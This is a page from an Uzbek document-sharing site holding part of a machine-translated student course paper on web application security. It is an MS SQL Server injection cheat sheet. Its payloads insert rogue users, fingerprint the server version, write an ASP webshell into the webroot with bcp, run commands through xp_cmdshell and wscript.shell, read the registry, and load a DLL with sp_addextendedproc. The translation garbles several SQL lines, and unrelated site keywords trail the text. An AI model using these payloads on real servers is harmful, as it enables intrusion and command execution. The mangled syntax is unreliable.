«veb dasturlar xavfsizligi»



Download 410,37 Kb.
bet7/14
Sana03.07.2022
Hajmi410,37 Kb.
#737373
1   2   3   4   5   6   7   8   9   10   ...   14
Bog'liq
kurs ishi1 (1)

14. Oddiy qo'shish (MSO +)
Misol:
"; foydalanuvchi qiymatlariga kiriting (1," hax0r "," coolpass ", 9) / *
15. Axborot to'plash
Sintaksis:
@@ versiya (MS)
Siz ma'lumotlar bazasining versiyasini va batafsil ma'lumotni topishingiz mumkin.
Misol:
INSERT INTO a'zolari (id, foydalanuvchi, o'tish) VALUES (1, "" + SUBSTRING (@@ versiya, 1.10), 10)
16. Murakkab qo'shish (S)
Fayl tarkibini jadvalga kiritishga imkon beradi. Agar veb-ilovaning ichki yo'lini bilmasangiz, IIS metabazasini o'qishingiz mumkin (faqat IIS 6).
Sintaksis:
fayl (% systemroot% \\ system32 \\ inetsrv \\ MetaBase.xml)
Keyin siz unda dastur yo'llarini topishingiz mumkin.

Misol:
1. Fo jadvalini yarating (varchar (8000 turidagi satr))
2. 'c: \\ inetpub \\ wwwroot \\ login.asp' faylini foo jadvaliga joylashtiring.
3. Vaqtinchalik jadvalni o'chirib, boshqa fayl uchun takrorlang.
17. BCP (S)
Matnli faylni yozadi. Buning uchun hisobga olish ma'lumotlari talab qilinadi.
Misol:
bcp "SELECT * FROM test..foo" so'rovi c: \\ inetpub \\ wwwroot \\ runcommand.asp -c -Slocalhost -Usa -Pfoobar
18. SQL Server (S) da VBS, WSH
SQL Serverda VBS, WSH skriptlaridan foydalanishingiz mumkin.
Misol:
Foydalanuvchi nomi: "; e'lon qiling @o intec sp_oacreate" wscript.shell ", @o out sp_oamethod @o," run ", NULL," notepad.exe "-
19. Tizim buyruqlarini bajarish (S)
Ma'lum bo'lgan hiyla-nayrang, funktsiya SQL Server 2005-da o'chirilgan. Sizga administrator huquqlari kerak.
Misol:
EXEC master.dbo.xp_cmdshell "cmd.exe dir c:"
EXEC master.dbo.xp_cmdshell "ping"
20. SQL Server (S) dagi maxsus jadvallar.
Misollar:
Xato xabarlari: master..sessmages
Tegishli serverlar: master..servvers
SQL Server 2000 paroli: magistrlar ...
SQL Server 2005 paroli: sys.sql_logins
21. SQL Server (S) uchun saqlanadigan bir nechta protseduralar.
Sintaksis:
Cmd Execute (xp_cmdshell)
Ro'yxatdan o'tish ma'lumotlari (xp_regread):
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Xizmatlarni boshqarish (xp_servicecontrol)
Medialar (xp_availablemedia)
ODBC manbalari (xp_enumdsn)
Kirish rejimi (xp_loginconfig)
Cab fayllarini yaratish (xp_makecab)
Domenlarni ro'yxati (xp_ntsec_enumdomains)
Jarayonni o'ldirish (PID talab qilinadi) (xp_terminate_process)
Yangi protsedura qo'shish (sp_addextendedproc)
UNC yoki ichki yo'lga matnli faylni yozish (sp_makewebtask)
Misollar:
exec xp_regread HKEY_LOCAL_MACHINE, "SYSTEM \\ CurrentControlSet \\ Services \\ lanmanserver \\ parametrlari", "nullsessionshares"
exec xp_regenumvalues \u200b\u200bHKEY_LOCAL_MACHINE, "SYSTEM \\ CurrentControlSet \\ Xizmatlar \\ snmp \\ parametrlari \\ yaroqliligi"
sp_addextendedproc 'xp_webserver', 'c: \\ temp \\ x.dll'
exec xp_webserver

Download 410,37 Kb.

Do'stlaringiz bilan baham:
1   2   3   4   5   6   7   8   9   10   ...   14



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling
kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha

yuklab olish